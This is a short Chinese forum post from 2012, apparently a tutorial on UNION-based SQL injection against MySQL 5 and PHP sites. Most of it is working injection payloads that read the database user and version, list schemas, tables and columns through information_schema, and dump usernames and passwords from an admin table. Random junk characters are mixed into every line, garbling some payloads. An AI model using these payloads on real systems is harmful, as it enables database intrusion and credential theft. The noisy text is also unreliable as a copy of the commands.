) W' n) D/ w7 k9 y8 l
教程内容:Mysql 5+php 注入0 I8 }$ U3 w8 N! ]
6 S% j9 g/ e/ y
+ t3 e& g7 o% s
' q, h$ S/ J" M% q. Y) ~
一.查看MYSQL基本信息(库名,版本,用户)& u) \: z7 ~0 N% a! T, v* g2 ~2 `8 `
c2 k4 T3 k1 G- [- j* _$ b. b. V
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
# w8 F& `- ^5 h5 P0 w* o0 z2 D
" A5 p2 X9 s0 o: }. ^3 l二.查数据库, T3 B: A# P5 T7 V6 i8 q* K7 m
7 ~! q& a8 @, Y- Sand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/* k' g- j( |0 E2 B! d+ [. b
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。( H' x# Y* R F( J
" [: B! t) Y l' l! c
三.暴表7 p7 k* d" J$ O. l/ _7 m8 G
8 g6 z+ N& \% K& b3 h! m4 [0 Sand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*! p' f* e0 X; l* s" e: X
+ D0 Y# x+ M5 w" U! alimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。& Q" S/ O6 A. |1 m& I9 H2 |
$ ?0 }: W6 z0 C
四.暴字段* I! W# w/ o) X$ f: G
9 T; T; l* r" Tand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
+ D: M; ]# f) E" Z! o3 N. Q7 e% O5 L
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。4 B% u- v( z8 b# K4 _
" D# k' C N5 U
五.暴数据9 {# u3 x( j- T! x
( M# f; T% A' l; A" X3 t' kand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
4 |3 A* J5 r3 u; A* h0 a2 A4 R) I0 W' f8 K
0 u3 p5 E) n8 k$ E这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
f! o. X0 U$ j' Y1 ` |
发表于 2012-9-13 16:27:53
收藏
支持
反对